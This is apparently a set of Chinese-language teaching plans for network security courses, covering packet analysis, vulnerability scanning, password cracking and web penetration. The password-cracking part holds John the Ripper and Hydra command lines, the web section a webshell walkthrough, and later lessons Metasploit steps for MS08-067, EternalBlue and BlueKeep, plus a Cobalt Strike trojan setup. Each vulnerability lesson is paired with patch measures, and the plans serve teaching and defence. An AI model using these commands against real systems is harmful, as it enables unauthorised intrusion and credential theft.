)發(fā)展的理念。四、課堂小結1.Linux操作系統(tǒng)概述2.用戶和組的安全管理3.防火墻安全配置4.Apache的安全配置5.Samba的安全配置6.Vsftpd的安全配置五、作業(yè)布置根據本節(jié)課學的知識,嘗試自己動手進行安全配置。組織學生做一下Linux問卷調查,了解學生的基本情況,引入新課內容。通過與Windows操作系統(tǒng)作比較,結合著來理解Linux采用演示法進行講解,學生能更直觀的學習和理解相關內容在教授Linux操作系統(tǒng)安全配置的過程中,應當充分挖掘和運用課程內容中所蘊含的思想政治教育資源,以培養(yǎng)學生的社會責任感和職業(yè)道德。梳理本堂課知識,強調重點和難點,提高知識總結與歸納能力提高學生動手能力,使得學生對本節(jié)課所學知識有一個更深入的了解。網絡安全技術教學設計題目網絡安全技術授課專業(yè)學情分析了解學生對網絡安全的基本概念和原理的掌握程度,包括他們是否能夠識別不同類型的網絡威脅,如病毒、木馬、釣魚攻擊等。評估學生在實際環(huán)境中應用網絡安全知識的能力,例如配置防火墻和入侵檢測系統(tǒng),以及對網絡安全事件的響應和處理能力。分析教學方法的有效性,包括理論講授、案例分析和實踐操作等,以及這些方法在提高學生網絡安全意識和技能方面的作用??疾鞂W生對網絡安全主題的興趣和學習動機,這對于他們的積極參與和學習效果至關重要。識別學生在學習過程中可能遇到的挑戰(zhàn),如專業(yè)術語的理解、復雜技術的應用等,并提供相應的支持和輔導。教學目標確保學生能夠理解網絡安全的意義,認識各種網絡安全威脅,掌握基本的網絡安全防范措施,并在實際生活中加以應用。過程與方法在教學過程中,應該注重理論與實踐相結合。通過課堂講解、案例分析和實驗操作等方式,讓學生在實踐中學習和體驗網絡安全的重要性。情感態(tài)度與價值觀強調網絡安全的道德和法律層面,培養(yǎng)學生的責任感和合法使用網絡的意識。教學重點了解并掌握各種網絡安全技術教學難點掌握各種網絡安全技術并學會安全配置教學方法采用多樣化的教學方法,如講授、討論、合作學習、案例分析等,以適應不同學生的學習需求和偏好。同時,利用現(xiàn)代教育技術手段,如多媒體教學、網絡模擬等,提高教學效果。持續(xù)更新鑒于網絡安全技術的快速變化,強調終身學習的重要性,鼓勵學生持續(xù)更新知識和技能。教學過程教學內容課堂組織一、案例引入列舉身邊的例子,是學生認識到掌握網絡安全技術的重要性二、新課講解1.數(shù)據包分析(1)概述意義:分析數(shù)據包可以使信息傳輸不再存在秘密對數(shù)據包進行深入分析,是為了更好地了解網絡是如何運行,數(shù)據包是如何被轉發(fā),應用是如何被訪問當再次出現(xiàn)網絡故障或網絡應用問題時,就能夠很快地解決數(shù)據包分析的內容①了解網絡的工作原理。②查看網絡使用情況及網絡上的通信主體。③確認哪些應用占用帶寬。④識別網絡中存在的攻擊或惡意行為。⑤分析網絡故障和延時大小。⑥查看用戶訪問應用的速度。⑦優(yōu)化和改進應用性能。獲取數(shù)據包通過數(shù)據鏈路層獲取②通過網絡層獲?。?)Wireshark介紹特點(1)深入檢查數(shù)百種協(xié)議,并且不斷添加更多協(xié)議(2)實時捕獲和離線分析(3)標準三窗格數(shù)據包瀏覽器(4)多平臺:在Windows、Linux、macOS、Solaris、FreeBSD、NetBSD和其他許多平臺上運行(5)可以通過GUI或通過TTY模式的TShark實用程序瀏覽捕獲的網絡數(shù)據(6)業(yè)界最強大的顯示過濾器(7)豐富的VoIP分析(8)讀/寫許多不同的捕獲文件格式(9)可以動態(tài)解壓縮使用Gzip壓縮的捕獲文件(10)實時數(shù)據從以太網、IEEE802.11、PPP/HDLC、ATM、藍牙、USB、令牌環(huán)、幀中繼、FDDI等中讀?。ㄈQ于用戶的平臺)(11)支持對許多協(xié)議的解密,包括IPsec、ISAKMP、Kerberos、SNMPv3、SSL/TLS、WEP和WPA/WPA2(12)可以將著色規(guī)則應用于數(shù)據包列表,以便進行快速、直觀的分析(13)輸出可以導出為XML、PostScript、CSV或純文本使用場景網絡管理員可以使用它來解決網絡問題網絡安全工程師可以使用它來檢查安全問題質量保證工程師可以使用它來驗證網絡應用開發(fā)人員使用它可以來調試協(xié)議網絡工程師可以使用它來學習網絡協(xié)議安裝下載Wireshark運行→安裝向導→單擊“Next”在“ChooseInstallLocation”窗口→單擊“Browse...”→選擇軟件安裝位置→單擊“Next”在“USBCapture”窗口→勾選“InstallUSBPcap”→單擊“Install”→開始安裝安裝中選擇默認配置,即一直單擊“Next”按鈕“CompletingWireshark4.0.864-bitSetup”窗口→單擊“Finish”中文設置如果你選擇中文,請選擇合適的字體:“編輯”→“首選項設置”→“用戶接口”→“字體”(3)分析實例背景:有一個網站被8惡意入侵,使用Wireshark可以抓到被攻擊的流量,分析數(shù)據包,找到這次入侵的漏洞。步驟:(1)啟動網站與Wireshark(2)用漏洞掃描工具掃描網站,掃描出SQL注入漏洞(3)在Wireshark上尋找并分析SQL注入漏洞的POST請求包(4)找出SQL注入漏洞利用的關鍵字即可定位數(shù)據包及發(fā)生注入的參數(shù)2.漏洞檢測(1)概念安全漏洞是指計算機系統(tǒng)在硬件、軟件、協(xié)議的設計、具體實現(xiàn)及系統(tǒng)安全策略上存在的缺陷和不足。漏洞檢測就是希望能夠防患于未然,在漏洞被利用之前發(fā)現(xiàn)漏洞并修補漏洞。(2)原理1.主機在線探測為了避免不必要的空掃描,在掃描之前一般要先探測主機是否在線其實現(xiàn)原理和常用的ping命令相似具體方法是向目標主機發(fā)送ICMP報文請求,根據返回值來判斷主機是否在線2.端口狀態(tài)探測發(fā)送1個SYN包到主機端口并等待響應如果端口打開,則響應必定是SYN+ACK信息包如果端口關閉,則會收到RST+ACK信息包這個掃描可以被稱為半打開(Half-Scan)掃描3.操作系統(tǒng)探測在進行網絡入侵或攻擊時,了解操作系統(tǒng)的類型是相當重要的,因為攻擊者可以由此明確利用哪種漏洞,或者由此掌握操作系統(tǒng)存在的弱點。4.主機漏洞檢測漏洞檢測是指使用漏洞檢測程序對目標系統(tǒng)進行信息查詢。一般主要通過以下兩種方法來檢查目標主機是否存在漏洞:基于漏洞庫的規(guī)則匹配和基于模擬攻擊。(3)技術安全掃描、源代碼掃描、反匯編掃描、環(huán)境錯誤注入(4)工具①Nessus:可以同時在本機或遠端上遙控,進行系統(tǒng)的漏洞分析掃描。②OpenVAS:一個開源的漏洞掃描器,用于評估網絡的安全性。③QualysGuard:一個云計算安全評估工具,用于評估網絡、Web應用程序和移動應用程序的安全性。④BurpSuite:一個專業(yè)級的Web應用程序安全測試工具,用于檢測Web應用程序中的安全漏洞。3.密碼破解密碼破解是指使用技術手段破譯或猜測密碼的過程。密碼是用來保護信息安全的數(shù)字賬戶,如電子郵件賬戶、社交媒體賬戶、銀行賬戶等的重要信息和數(shù)據的一種安全措施。(1)數(shù)據加密技術概述數(shù)據加密技術又被稱為密碼技術或密碼學,它是一門既古老又年輕的學科。隨著互聯(lián)網的發(fā)展,現(xiàn)代密碼學的應用從政治、軍事、外交等傳統(tǒng)領域開始進入商業(yè)、金融、娛樂等領域,它的商業(yè)價值和社會價值得到了充分肯定也極大地推動了現(xiàn)代數(shù)據加密技術的應用和發(fā)展。功能1)保護信息的機密性2)保護信息的完整性3)認證4)訪問控制現(xiàn)代加密算法1)對稱加密算法2)非對稱密鑰算法3)單向加密算法實現(xiàn)數(shù)據加密1)尋找在線加密的網站2)手動編寫加密程序(2)密碼破解方法字典攻擊、強行攻擊、社會工程攻擊(3)密碼破解實例——使用JohntheRipper破解Linux操作系統(tǒng)密碼內容JohntheRipper是免費的開源軟件,支持目前大多數(shù)的加密算法,如DES、MD4、MD5等。它支持多種不同類型的系統(tǒng)架構,包括UNIX、Linux、Windows、DOS、BeOS和OpenVMS,主要目的是破解不夠牢固的UNIX/Linux操作系統(tǒng)密碼。在本實驗中,我們事先登錄Linux操作系統(tǒng)并切換為管理員權限,以便獲取/etc/passwd和/etc/shadow文件。步驟(1)登錄Linux操作系統(tǒng),以超級用戶權限執(zhí)行unshadow/etc/passwd/etc/shadow>shadow(2)在剛剛寫入的shadow文件目錄執(zhí)行john--format=cryptshadow(4)密碼破解實例——使用Hydra暴力破解SSH密碼內容Hydra是一種強大的網絡安全測試工具,旨在測試網絡的安全性和漏洞。它是一個魚叉攻擊工具,通過嘗試不同的用戶名和密碼組合,以及暴力破解攻擊等方法,來測試系統(tǒng)的弱點。本次攻擊機的IP地址為28,靶機的IP地址31。步驟在攻擊機上安裝Hydra并執(zhí)行命令hydra-Luser.txt-Ptop100_ssh_vps.txt31ssh-vV4.Web滲透(1)Web架構靜態(tài)網頁請求——HTML動態(tài)網頁請求——小程序動態(tài)數(shù)據訪問——數(shù)據庫服務器用戶狀態(tài)信息的保存(2)Web安全需求Web服務器的安全需求1)維護公布信息的真實性和完整性2)維持Web服務的安全可用3)保護Web訪問者的隱私4)保證Web服務器不被入侵者作為“跳板”Web瀏覽器的安全需求(1)確保運行Web瀏覽器的系統(tǒng)不被計算機病毒、木馬或其他惡意程序侵害而被破壞。(2)確保個人安全信息不外泄。(3)確保所交互的站點的真實性,以免被騙,遭受損失。3.Web傳輸?shù)陌踩枨螅?)保證發(fā)送方(信息)的真實性。(2)保證傳輸信息的完整性。(3)特殊的安全性較高的Web要求傳輸具有保密性。(4)認證應用的Web要求信息具有不可抵賴性。(5)防偽要求較高的Web應用需要保證信息的不可重用性。(3)Web滲透測試①黑盒測試名詞介紹Webshell一句話木馬RCE(RemoteCodeExecution,遠程代碼執(zhí)行)SQL注入XSS(Cross-SiteScripting)注入SSI(ServerSideInclude)注入SSRF(Server-SideRequestForgery)任意文件讀取工具介紹Metasploit蟻劍(AntSword)測試方法等價類劃分法邊界值分析法錯誤推測法因果圖法②白盒測試優(yōu)缺點白盒測試的優(yōu)點:(1)迫使測試人員仔細思考軟件的實現(xiàn)。(2)可以檢測代碼中的每條分支和路徑。(3)揭示隱藏在代碼中的錯誤。(4)對代碼的測試比較徹底。(5)最優(yōu)化。白盒測試的缺點:(1)昂貴。(2)無法檢測代碼中遺漏的路徑和數(shù)據敏感性錯誤。(3)不驗證規(guī)格的正確性。測試方法及覆蓋標準白盒測試的測試方法有代碼檢查法、靜態(tài)結構分析法、靜態(tài)質量度量法、邏輯覆蓋法、基本路徑測試法、域測試、符號測試、路徑覆蓋和程序變異。白盒測試的覆蓋標準有語句覆蓋、判定覆蓋、條件覆蓋、判定/條件覆蓋、條件組合覆蓋和路徑覆蓋,發(fā)現(xiàn)錯誤的能力由弱至強。(4)Web滲透實例①黑盒測試實例使用BurpSuite攻擊ThinkPHP5.0.22的Web應用程序(1)準備ThinkPHP5.0.22遠程代碼執(zhí)行的Payload(攻擊載荷)(2)使用BurpSuite發(fā)送Payload(3)成功執(zhí)行phpinfo()使用蟻劍連接Webshell(1)利用漏洞在網站根目錄寫入shell.php(2)使用蟻劍工具進行連接(3)連接之后可以在被攻擊的目標上執(zhí)行命令,以及上傳和下載文件②白盒測試實例(1)從Web應用程序的代碼中尋找可能存在的漏洞(2)使用MySQLMonitor來監(jiān)控數(shù)據庫執(zhí)行語句(3)使用FileMonitor來監(jiān)控網站根路徑下的文件5.惡意代碼RogerA.Grimes將惡意代碼定義為:經過存儲介質和網絡進行傳播,從一臺計算機系統(tǒng)到另外一臺計算機系統(tǒng),未經授權認證破壞計算機系統(tǒng)完整性的程序或代碼。它包括計算機病毒、蠕蟲、特洛伊木馬、邏輯炸彈、病菌、用戶級RootKit、核心級RootKit、腳本惡意代碼和惡意ActiveX控件等。(1)計算機病毒定義:計算機病毒是人為制造的、能夠進行自我復制的、破壞計算機資源的一組程序或命令的集合。工作原理:1)感染2)潛伏3)傳播4)發(fā)作典型:1)腳本病毒2)宏病毒3)HTML病毒(2)蠕蟲定義:蠕蟲是一種特殊的計算機病毒。蠕蟲不需要用戶的操作,只要駐留在內存中,它就會主動向其他的計算機進行傳播。傳播過程:1)掃描2)攻擊3)復制(3)木馬概述:木馬是目前比較流行的病毒文件,與一般的計算機病毒不同,木馬的作用是偷偷監(jiān)視和盜竊密碼、數(shù)據等。特性:1)隱蔽性2)自動運行性3)欺騙性4)自動恢復5)自動打開特別的端口6)功能的特殊性木馬類型1)后門木馬2)鏈接木馬3)下載木馬4)蠕蟲木馬防范和清除木馬1)不隨意下載軟件2)不隨意打開附件3)使用防毒軟件并經常更新病毒庫4)查看文件擴展名5)安裝木馬查殺工具(4)惡意代碼實例——CobaltStrike遠控木馬實驗工具CobaltStrike(以下簡稱CS)是一款以Metasploit為基礎的GUI的框架式滲透測試工具,它包括兩個可運行的程序teamserver和cobaltstrike.jar。目的使用CS對目標計算機進行控制。步驟(1)在下載和安裝木馬軟件前,需要關閉殺毒軟件的自動防護功能(2)攻擊者在遠程目標主機上運行teamserver,將連接口令設置為4040404(3)運行cobaltstrike.jar,打開CS客戶端,輸入遠程服務器IP地址和服務器端啟動時的連接口令,單擊“Connect”(4)在首頁選擇“CobaltStrike”→“Listeners”→“Add”命令,配置監(jiān)聽器參數(shù),單擊“Save”(5)先選擇“Payloads”→“WindowsStagerPayload”,然后選擇創(chuàng)建的監(jiān)聽器,單擊“Generate”來生成木馬(6)假設攻擊者已經將木馬的服務器端程序偷偷放到了目標主機上,并在目標主機上加載運行了剛剛生成的木馬。(7)接下來攻擊者可以使用CS客戶端來操作目標主機。6.信息隱藏(1)概述信息隱藏也被稱為數(shù)據隱藏(DataHiding),是集多學科理論與技術于一身的新興技術領域。信息隱藏技術主要是指將特定的信息嵌入數(shù)字化宿主信息(如文本,數(shù)字化的聲音、圖像、視頻信號等)中。(2)實例利用云函數(shù)來隱藏C2服務器利用域前置來隱藏C2服務器防范利用云函數(shù)隱藏的惡意服務器三、思政課堂在網絡安全技術的教學中注重培養(yǎng)學生的家國情懷,即引導學生理解和關心國家網絡安全的重要性,以及個人在其中應承擔的責任和角色。同時,通過教學活動強化學生的個人品格,如誠實守信、遵紀守法等職業(yè)道德。四、課堂小結1.數(shù)據包分析2.漏洞檢測3.密碼破解4.Web滲透5.惡意代碼6.信息隱藏五、作業(yè)布置根據本節(jié)課學的知識,嘗試自己動手進行安全配置。鼓勵學生思考,自由討論,激發(fā)學生的學習欲望,引入新課內容。采用案例結合的方法,學生能更直觀的學習和理解相關定義采用案例結合的方法,學生能更直觀的學習和理解相關定義梳理本堂課知識,強調重點和難點,提高知識總結與歸納能力常見的系統(tǒng)漏洞教學設計題目常見的系統(tǒng)漏洞授課專業(yè)學情分析了解學生的基礎理論知識、技能水平以及他們對系統(tǒng)漏洞的認識程度。確定教學的具體目標,例如,學生應該掌握哪些類型的系統(tǒng)漏洞,如何發(fā)現(xiàn)和防御這些漏洞,以及如何通過實驗來加深理解。教學目標通過學習,學生能夠識別和描述常見的系統(tǒng)漏洞類型,掌握使用各種安全工具和技術來發(fā)現(xiàn)、分析和利用系統(tǒng)漏洞的能力。過程與方法在教學過程中,應該注重理論與實踐相結合。通過課堂講解、案例分析和實驗操作等方式,讓學生在實踐中學習和體驗網絡安全的重要性。情感態(tài)度與價值觀使學生認識到系統(tǒng)漏洞對個人、組織和社會經濟的影響,培養(yǎng)起高度的安全意識和終身學習的習慣。教學重點了解并掌握各種系統(tǒng)漏洞影響的系統(tǒng)及版本、造成的危害和補救措施教學難點如何對系統(tǒng)漏洞進行補救教學方法采用多樣化的教學方法,如講授、討論、合作學習、案例分析等,以適應不同學生的學習需求和偏好。同時,利用現(xiàn)代教育技術手段,如多媒體教學、網絡模擬等,提高教學效果。持續(xù)更新學生了解如何獲取最新的安全動態(tài)和技術更新,以保持自己的知識和技能與時俱進。教學過程教學內容課堂組織一、案例引入列舉身邊的例子,是學生認識到系統(tǒng)漏洞的危害二、新課講解1.MS08_067漏洞(1)概述MS08-067漏洞的全稱是“WindowsServer服務RPC請求緩沖區(qū)溢出漏洞”,是在MSRPCoverSMB通道調用Server服務程序中的NetPathCanonicalize函數(shù)時觸發(fā)的。在遠程訪問其他主機時,會調用NetpwPathCanonicalize函數(shù),對遠程訪問的路徑進行規(guī)范化,如果在NetpwPathCanonicalize函數(shù)中發(fā)生了棧緩沖區(qū)內存錯誤,就可能被利用實施遠程代碼執(zhí)行。(2)影響的系統(tǒng)及版本(1)MicrosoftWindows2000ServicePack4(2)WindowsXPServicePack2(3)WindowsXPServicePack3(4)WindowsXPProfessionalx64Edition(5)WindowsXPProfessionalx64EditionServicePack2(6)WindowsServer2003ServicePack1(7)WindowsServer2003ServicePack2(8)WindowsServer2003x64Edition(9)WindowsServer2003x64EditionServicePack2(10)WindowsServer2003SP1(11)WindowsServer2003SP2(12)WindowsVista和WindowsVistaServicePack1(13)WindowsVistax64Edition和WindowsVistax64EditionServicePack1(14)WindowsServer2008(用于32位系統(tǒng))(15)WindowsServer2008(用于基于x64的系統(tǒng))(16)WindowsServer2008(用于基于Itanium的系統(tǒng))(17)Windows7Beta(用于32位系統(tǒng))(18)Windows7Betax64Edition(19)Windows7Beta(用于基于Itanium的系統(tǒng))(3)漏洞復現(xiàn)①在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useexploit/windows/smb/ms08_067_netapi使用攻擊載荷:setpayloadgeneric/shell_bind_tcp設置攻擊機器監(jiān)聽端口:setlport4444設置攻擊目標的IP地址:setrhosts執(zhí)行攻擊:exploit②執(zhí)行“cd..”命令2次返回到根目錄,執(zhí)行“typetest.txt”命令查看被攻擊計算機上C盤目錄下的test.txt文件的內容。(4)漏洞造成的危害攻擊者可以利用MS08_067漏洞獲取目標主機的最高系統(tǒng)權限。(5)修補措施①升級到最新的Windows操作系統(tǒng)。②安裝KB958644補丁。2.MS15_034漏洞(1)概述HTTP協(xié)議堆棧(HTTP.sys)中存在一個遠程代碼執(zhí)行漏洞,當HTTP.sys錯誤地解析特制HTTP請求時,會觸發(fā)該漏洞。成功利用此漏洞的攻擊者可以在系統(tǒng)賬戶的上下文中執(zhí)行任意代碼。(2)影響的系統(tǒng)及版本(1)WindowsServer2003。(2)WindowsVista。(3)WindowsServer2008。(4)Windows7。(5)WindowsServer2008R2。(6)Windows8和Windows8.1。(7)WindowsServer2012和WindowsServer2012R2。(8)WindowsRT和WindowsRT8.1。(3)漏洞復現(xiàn)(1)在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useauxiliary/scanner/http/ms15_034_http_sys_memory_dump設置攻擊目標的IP地址:setrhosts執(zhí)行攻擊:run(2)利用MS15_034漏洞。(3)查看目標計算機。(4)造成溢出,觸發(fā)漏洞造成藍屏(4)造成的危害①遠程讀取IIS服務器的數(shù)據。②造成服務器系統(tǒng)藍屏崩潰。(5)修補措施對于MS15_034漏洞,微軟給的建議是安裝補丁KB3042553。如果操作系統(tǒng)長時間未進行升級會顯示“此更新不適用于您的計算機”,此時需要安裝前置補丁KB3021910、KB2919355、KB3042553。其中,KB2919355是一組補丁。安裝補丁后,使用Range驗證,響應為“BadRequest”,說明此攻擊無效,已經修復漏洞。3.MS17_010漏洞(1)概述MS17-010(永恒之藍漏洞)的爆發(fā)源于WannaCry勒索病毒的誕生,該病毒是不法分子利用美國國家安全局泄露的漏洞“EternalBlue”(永恒之藍)改造而成的。MS17-010漏洞通過TCP的445和139端口,利用SMBv1和NBT中的遠程代碼執(zhí)行漏洞,通過惡意代碼掃描并攻擊開放445文件共享端口的Windows主機。(2)影響的系統(tǒng)及版本(1)WindowsNT。(2)Windows2000。(3)WindowsXP。(4)Windows2003。(5)WindowsVista。(6)Windows7。(7)Windows8。(8)Windows2008。(9)Windows2008R2。(10)WindowsServer2012SP0。(3)漏洞復現(xiàn)①在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useexploit/windows/smb/ms17_010_eternalblue設置攻擊目標的IP地址:setrhosts設置攻擊載荷:setpayloadwindows/x64/meterpreter/reverse_tcp設置本機的IP地址:setlhosts設置本機的監(jiān)聽端口:setlport4444執(zhí)行攻擊:exploit②成功獲取目標主機權限。(4)造成的危害①攻擊者可以獲取目標主機的最高權限。②容易感染WannaCry勒索病毒。(5)修補措施不同版本的操作系統(tǒng)對應的MS17-010補丁編號如下。(1)WindowsXP特別補丁KB4012598(2)Windows2003特別補丁KB4012598(3)Windows2008R2補丁KB4012212、KB4012215(4)Windows7補丁KB4012212、KB4012215(5)Windows732位補丁KB4012212、KB4012215(6)Windows764位補丁KB4012212、KB4012215(7)Windows101607補丁KB4013429(8)Windows10160732位補丁KB4013429(9)Windows10160764位補丁KB4013429(10)Windows2012R2補丁KB4012213、KB4012216(11)Windows2016補丁KB40134294.CVE-2019-0708漏洞(1)概述在2019年5月的補丁周期中,微軟在其遠程桌面服務(RDS)中發(fā)布了一個遠程代碼執(zhí)行錯誤補丁。遠程未經身份驗證的攻擊者可以通過將精心設計的RDP消息發(fā)送到目標服務器來利用此漏洞。攻擊者成功利用此漏洞可以執(zhí)行任意代碼。(2)影響的系統(tǒng)及版本(1)WindowsXP(2)Windows7(3)WindowsServer2003(4)WindowsServer2008(5)WindowsServer2008R2(3)漏洞復現(xiàn)①在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useexploit/windows/rdp/cve_2019_0708_bluekeep_rce設置攻擊目標的IP地址:setrhosts68設置攻擊載荷:setpayloadwindows/x64/meterpreter/reverse_tcp設置本機的IP地址:setlhosts20設置本機的監(jiān)聽端口:setlport4444執(zhí)行攻擊:exploit②成功獲取到目標主機權限。(4)造成的危害①攻擊者可以獲取目標主機的最高權限。②可能造成目標主機藍屏。(5)修補措施(1)微軟已發(fā)布官方補丁程序修復該漏洞,騰訊安全專家建議用戶使用WindowsUpdate或騰訊電腦管家、騰訊御點終端安全管理系統(tǒng)的漏洞修復功能安裝補丁程序。(2)用戶也可以參考微軟官方網站的
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- GB/T 45964-2025熔融鋼渣熱悶技術規(guī)范
- 教育學教育心理學??荚囶}及答案l
- 玉林市博白縣輔警考試題《公安基礎知識》綜合能力試題庫附答案
- 高頻數(shù)據的面試題及答案
- 中醫(yī)婦產科試題及答案
- 2025醫(yī)院感染知識試題題庫(有參考答案)
- 高頻煤炭地質勘探隊面試題及答案
- 金屬非金屬礦井通風作業(yè)考試題庫試卷附答案
- 二建法規(guī)歷年真題答案及解析
- 《安全生產法》考試試題及答案
- 臨床提高吸入劑使用正確率品管圈成果匯報
- 娛樂場所安全管理規(guī)定與措施
- GB/T 45701-2025校園配餐服務企業(yè)管理指南
- 電影項目可行性分析報告(模板參考范文)
- 老年協(xié)會會員管理制度
- LLJ-4A車輪第四種檢查器
- 大索道竣工結算決算復審報告審核報告模板
- 2025年南充市中考理科綜合試卷真題(含標準答案)
- JG/T 3049-1998建筑室內用膩予
- 人衛(wèi)基礎護理學第七版試題及答案
- 煙草物流寄遞管理制度
評論
0/150
提交評論